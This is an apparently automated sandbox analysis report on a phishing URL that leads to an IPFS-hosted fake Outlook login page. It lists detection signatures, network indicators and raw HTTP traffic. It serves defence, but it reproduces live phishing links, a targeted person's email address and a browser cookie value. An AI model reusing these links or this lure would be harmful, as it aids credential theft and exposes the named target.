Edit tour

Windows Analysis Report
https://www.miglioremacchinadacucire.it/ertyuiop09876sdfg.html#cGVkcm8uZmlndWVpcmFAbm92b2JhbmNvLnB0

Overview

General Information

Sample URL:https://www.miglioremacchinadacucire.it/ertyuiop09876sdfg.html#cGVkcm8uZmlndWVpcmFAbm92b2JhbmNvLnB0
Analysis ID:1324815
Infos:

Detection

HTMLPhisher
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish10
Antivirus detection for URL or domain
Phishing site detected (based on shot match)
Snort IDS alert for network traffic
Phishing site detected (based on logo match)
Creates files inside the system directory
Uses SMTP (mail sending)
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML body contains low number of good links
HTML title does not match URL

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 2992 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2000,i,10604161346318712430,12349371553034259168,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6500 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.miglioremacchinadacucire.it/ertyuiop09876sdfg.html#cGVkcm8uZmlndWVpcmFAbm92b2JhbmNvLnB0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_102JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    0.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      Timestamp:209.94.90.1192.168.2.4443497522023028 10/12/23-17:42:15.880252
      SID:2023028
      Source Port:443
      Destination Port:49752
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://www.miglioremacchinadacucire.it/ertyuiop09876sdfg.html#cGVkcm8uZmlndWVpcmFAbm92b2JhbmNvLnB0Avira URL Cloud: detection malicious, Label: phishing
      Source: https://www.miglioremacchinadacucire.it/ertyuiop09876sdfg.html#cGVkcm8uZmlndWVpcmFAbm92b2JhbmNvLnB0SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
      Source: https://www.miglioremacchinadacucire.it/ertyuiop09876sdfg.htmlAvira URL Cloud: Label: phishing

      Phishing

      barindex
      Source: Yara matchFile source: 0.0.pages.csv, type: HTML
      Source: Yara matchFile source: dropped/chromecache_102, type: DROPPED
      Source: https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html#pedro.figueira@novobanco.ptMatcher: Template: outlook matched
      Source: https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html#pedro.figueira@novobanco.ptMatcher: Template: outlook matched
      Source: https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html#pedro.figueira@novobanco.ptHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html#pedro.figueira@novobanco.ptHTTP Parser: Total embedded image size: 21514
      Source: https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html#pedro.figueira@novobanco.ptHTTP Parser: Number of links: 0
      Source: https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html#pedro.figueira@novobanco.ptHTTP Parser: Title: Outlook does not match URL
      Source: https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html#pedro.figueira@novobanco.ptHTTP Parser: <input type="password" .../> found
      Source: https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html#pedro.figueira@novobanco.ptHTTP Parser: No <meta name="author".. found
      Source: https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html#pedro.figueira@novobanco.ptHTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 104.85.244.112:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49769 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49771 version: TLS 1.2

      Networking

      barindex
      Source: TrafficSnort IDS: 2023028 ET TROJAN RAMNIT.A M1 209.94.90.1:443 -> 192.168.2.4:49752
      Source: global trafficTCP traffic: 192.168.2.4:61328 -> 150.136.204.204:25
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownTCP traffic detected without corresponding DNS query: 104.85.244.112
      Source: unknownTCP traffic detected without corresponding DNS query: 104.85.244.112
      Source: unknownTCP traffic detected without corresponding DNS query: 104.85.244.112
      Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
      Source: unknownTCP traffic detected without corresponding DNS query: 104.85.244.112
      Source: unknownTCP traffic detected without corresponding DNS query: 104.85.244.112
      Source: unknownTCP traffic detected without corresponding DNS query: 104.85.244.112
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownTCP traffic detected without corresponding DNS query: 150.136.204.204
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 150.136.204.204
      Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
      Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.66
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
      Source: unknownTCP traffic detected without corresponding DNS query: 8.250.197.254
      Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
      Source: unknownTCP traffic detected without corresponding DNS query: 8.250.197.254
      Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
      Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
      Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
      Source: unknownTCP traffic detected without corresponding DNS query: 8.250.197.254
      Source: unknownTCP traffic detected without corresponding DNS query: 8.250.197.254
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Oct 2023 15:42:18 GMTContent-Type: text/htmlContent-Length: 13476Connection: closeVary: Accept-EncodingServer: BunnyCDN-ES1-895CDN-PullZone: 1567618CDN-Uid: 070ccd6e-b4b0-4c90-b45a-e26d7534205dCDN-RequestCountryCode: USAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-MatchAccess-Control-Expose-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-MatchAccess-Control-Allow-Methods: GETAccess-Control-Allow-Methods: HEADAccess-Control-Allow-Methods: OPTIONSCache-Control: max-age=60, stale-while-revalidate=3600CDN-CachedAt: 10/12/2023 15:42:18X-Ipfs-Path: /ipfs/bafybeigblu4qxovihlbwqqqsnlmsccggutlinilmydzv2dlowtaoerxu4q/owa/auth/15.1.1591/themes/resources/segoeui-regular.ttfStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Request-ID: 4a917be885aa40f00475666d8981c076Referrer-Policy: strict-origin-when-cross-originContent-Security-Policy: upgrade-insecure-requestsX-XSS-Protection: 0X-Content-Type-Options: nosniffCDN-ProxyVer: 1.04CDN-RequestPullCode: 404CDN-RequestPullSuccess: TrueCDN-EdgeStorageId: 895CDN-Status: 404CDN-RequestId: 674357eb9fdf643de7a38a4b396cd64dCDN-Cache: EXPIRED
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Oct 2023 15:42:23 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: chromecache_108.1.drString found in binary or memory: http://getbootstrap.com)
      Source: chromecache_107.1.dr, chromecache_98.1.drString found in binary or memory: http://opensource.org/licenses/MIT).
      Source: chromecache_102.1.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
      Source: chromecache_102.1.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
      Source: chromecache_102.1.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js
      Source: chromecache_102.1.drString found in binary or memory: https://code.jquery.com/jquery-3.2.1.slim.min.js
      Source: chromecache_102.1.drString found in binary or memory: https://code.jquery.com/jquery-3.3.1.min.js
      Source: chromecache_102.1.drString found in binary or memory: https://code.jquery.com/jquery-3.3.1.slim.min.js
      Source: chromecache_103.1.drString found in binary or memory: https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html#
      Source: chromecache_100.1.drString found in binary or memory: https://getbootstrap.com)
      Source: chromecache_104.1.dr, chromecache_97.1.drString found in binary or memory: https://getbootstrap.com/)
      Source: chromecache_104.1.dr, chromecache_100.1.dr, chromecache_97.1.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
      Source: chromecache_104.1.dr, chromecache_100.1.dr, chromecache_97.1.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
      Source: chromecache_102.1.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js
      Source: chromecache_102.1.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
      Source: chromecache_102.1.drString found in binary or memory: https://outlook.live.com/owa/
      Source: chromecache_103.1.drString found in binary or memory: https://outlook.office.com/mail/
      Source: chromecache_102.1.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js
      Source: chromecache_102.1.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
      Source: chromecache_102.1.drString found in binary or memory: https://www.freepngimg.com/download/microsoft/70674-outlook-office-outlook.com-email-logo-365-micros
      Source: chromecache_102.1.drString found in binary or memory: https://www.google.com/s2/favicons?domain=
      Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk; 1P_JAR=2023-10-04-09
      Source: unknownDNS traffic detected: queries for: clients2.google.com
      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
      Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ertyuiop09876sdfg.html HTTP/1.1Host: www.miglioremacchinadacucire.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html HTTP/1.1Host: fleek.ipfs.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.miglioremacchinadacucire.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.14.0/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://fleek.ipfs.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://fleek.ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fleek.ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://fleek.ipfs.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://fleek.ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://fleek.ipfs.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://fleek.ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/3.3.7/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://fleek.ipfs.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://fleek.ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.0/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://fleek.ipfs.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://fleek.ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://fleek.ipfs.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://fleek.ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /owa/auth/15.1.1591/themes/resources/segoeui-regular.ttf HTTP/1.1Host: fleek.ipfs.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://fleek.ipfs.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://fleek.ipfs.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://fleek.ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fleek.ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /owa/auth/15.1.1591/themes/resources/segoeui-regular.ttf HTTP/1.1Host: ipfs.techConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://fleek.ipfs.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://fleek.ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /s2/favicons?domain=novobanco.pt HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fleek.ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk; 1P_JAR=2023-10-04-09
